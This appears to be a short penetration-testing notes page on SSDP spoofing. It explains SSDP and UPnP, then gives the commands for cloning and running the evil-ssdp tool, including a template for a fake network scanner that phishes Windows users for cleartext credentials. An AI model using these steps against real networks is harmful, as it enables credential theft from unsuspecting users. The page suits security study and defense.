🟨SSDP Spoofing

SSDP

SSDP or Simple Service Discovery Protocol is a network protocol designed for advertisement and discovery of network services. It can work without any DHCP or DNS Configuration. It was designed to be used in residential or small office environments. It uses UDP as the underlying transport protocol on port 1900. It uses the HTTP method NOTIFY to announce the establishment or withdrawal of services to a multicast group. It is the basis of the discovery protocol UPnP.

UPnP

UPnP or Universal Plug and Play is a set of networking protocols that allows networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points, and mobile devices to discover each other’s availability on the network and establish network services for communications, data sharing, and entertainment. The UPnP architecture supports zero-configuration networking. A UPnP compatible device from any vendor can dynamically join a network, obtain an IP address, announce its name, advertise or convey its capabilities upon request, and learn about the presence and capabilities of other devices.

Evil SSDP

GitHub - initstring/evil-ssdp: Spoof SSDP replies and create fake UPnP devices to phish for credentials and NetNTLM challenge/response.GitHub

A tool for setting up a fake SSDP device and phishing the user for clear text credentials:

The attacker has to be in the same network as the target systems.

git clone https://github.com/initstring/evil-ssdp.git
cd evil-ssdp/ls
python3 evil-ssdp.py --help

to run the attack :

python3 evil-ssdp.py -i eth0

to setup a fake scanner for phishing, use the scanner template:

python3 evil-ssdp.py eth0 --template scanner

if the user clicks on the scanner icon in windows explorer > networks, the default browser will open up a web page and ask for credentials in order to connect to the device:

if the user enters the credentials, EvilSSDP will grab and show them